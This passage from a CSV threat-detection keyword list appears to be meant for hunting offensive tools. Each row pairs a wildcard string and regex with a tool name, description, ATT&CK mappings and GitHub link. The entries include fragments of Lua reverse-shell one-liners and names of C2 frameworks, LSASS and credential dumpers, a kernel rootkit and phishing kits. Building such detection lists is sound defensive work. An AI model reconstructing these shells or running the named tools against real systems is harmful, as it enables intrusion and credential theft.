- T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""powershell"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""powershell\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""pwsh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""pwsh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('""zsh"" <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'\""zsh\""\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua -e*require('socket');*t:connect*os.execute('sh -i <&3 >&3 2>&3');*",".{0,1000}lua\s\-e.{0,1000}require\(\'socket\'\)\;.{0,1000}t\:connect.{0,1000}os\.execute\(\'sh\s\-i\s\<\&3\s\>\&3\s2\>\&3\'\)\;.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*lua5.1 -e*require(""socket"")*tcp:connect*io.popen*receive()*send()*",".{0,1000}lua5\.1\s\-e.{0,1000}require\(\""socket\""\).{0,1000}tcp\:connect.{0,1000}io\.popen.{0,1000}receive\(\).{0,1000}send\(\).{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*luckystrike.ps1*",".{0,1000}luckystrike\.ps1.{0,1000}","offensive_tool_keyword","luckystrike","A PowerShell based utility for the creation of malicious Office macro documents.","T1566 - T1059 - T1027","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/curi0usJack/luckystrike","1","1","N/A","10","10","1087","238","2017-11-03T17:52:13Z","2016-09-22T18:57:50Z" "*Luct0r/KerberOPSEC*",".{0,1000}Luct0r\/KerberOPSEC.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*LUgsLS1IT1NU*",".{0,1000}LUgsLS1IT1NU.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*luijait/PwnKit*",".{0,1000}luijait\/PwnKit.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","82","15","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*luks2john.py*",".{0,1000}luks2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*lures create *",".{0,1000}lures\screate\s.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - 
Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*LVAsLS1QT1JU*",".{0,1000}LVAsLS1QT1JU.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LW8sLS1vcHRpb25z*",".{0,1000}LW8sLS1vcHRpb25z.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LWIsLS1idWNrZXQ=*",".{0,1000}LWIsLS1idWNrZXQ\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LWYsLS1maWxl*",".{0,1000}LWYsLS1maWxl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LXAsLS1waWQ=*",".{0,1000}LXAsLS1waWQ\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LXAsLS1wYXlsb2Fk*",".{0,1000}LXAsLS1wYXlsb2Fk.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*LXUsLS11cmk=*",".{0,1000}LXUsLS11cmk\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*ly4k/Certipy*",".{0,1000}ly4k\/Certipy.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","7","680","69","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*ly4k/Certipy*",".{0,1000}ly4k\/Certipy.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*ly4k/PassTheChallenge*",".{0,1000}ly4k\/PassTheChallenge.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*lyncsmash*",".{0,1000}lyncsmash.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations","T1580 - T1201 - T1071 - T1110 - T1078","TA0043 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*lyncsmash.git*",".{0,1000}lyncsmash\.git.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*lyncsmash.log*",".{0,1000}lyncsmash\.log.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft 
Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*lyncsmash.py*",".{0,1000}lyncsmash\.py.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*lyncsmash-master*",".{0,1000}lyncsmash\-master.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*LyncSniper*",".{0,1000}LyncSniper.{0,1000}","offensive_tool_keyword","LyncSniper","LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted either on premise or in Office 365","T1566 - T1574 - T1210 - T1596","TA0002 - TA0011 - TA0009","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/LyncSniper","1","0","N/A","7","1","9","3","2017-04-11T08:38:28Z","2017-06-12T10:56:58Z" "*-m * -d * -w * --top-web-ports*",".{0,1000}\-m\s.{0,1000}\s\-d\s.{0,1000}\s\-w\s.{0,1000}\s\-\-top\-web\-ports.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "*-m dumpert *",".{0,1000}\-m\sdumpert\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - 
T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*-M handlekatz -o *",".{0,1000}\-M\shandlekatz\s\-o\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*'M', 'E', 'L', 'T', 'E', 'D', 0*",".{0,1000}\'M\',\s\'E\',\s\'L\',\s\'T\',\s\'E\',\s\'D\',\s0.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*'M', 'i', 'n', 'i', 'D', 'u', 'm', 'p', 'W', 'r', 'i', 't', 'e', 'D', 'u', 'm', 'p'*",".{0,1000}\'M\',\s\'i\',\s\'n\',\s\'i\',\s\'D\',\s\'u\',\s\'m\',\s\'p\',\s\'W\',\s\'r\',\s\'i\',\s\'t\',\s\'e\',\s\'D\',\s\'u\',\s\'m\',\s\'p\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*'M','i','n','i','D','u','m','p','W','r','i','t','e','D','u','m','p'*",".{0,1000}\'M\',\'i\',\'n\',\'i\',\'D\',\'u\',\'m\',\'p\',\'W\',\'r\',\'i\',\'t\',\'e\',\'D\',\'u\',\'m\',\'p\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*M.i.m.i.k.a.t.z*",".{0,1000}M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*M.i.m.i.k.a.t.z*",".{0,1000}M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*m00zh33/golang_c2*",".{0,1000}m00zh33\/golang_c2.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*m0nad/Diamorphine*",".{0,1000}m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*m0rv4i/SharpCookieMonster*",".{0,1000}m0rv4i\/SharpCookieMonster.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. 
even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*m3f157O/combine_harvester*",".{0,1000}m3f157O\/combine_harvester.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*m4ll0k/SecretFinder*",".{0,1000}m4ll0k\/SecretFinder.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*m8sec/nullinux*",".{0,1000}m8sec\/nullinux.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*MAAD_Attack.ps1*",".{0,1000}MAAD_Attack\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*MAAD_Config.ps1*",".{0,1000}MAAD_Config\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*MAAD_Mitre_Map.ps1*",".{0,1000}MAAD_Mitre_Map\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*MAADInitialization.ps1*",".{0,1000}MAADInitialization\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*mac.changer on*",".{0,1000}mac\.changer\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*mac_dirty_cow.*",".{0,1000}mac_dirty_cow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
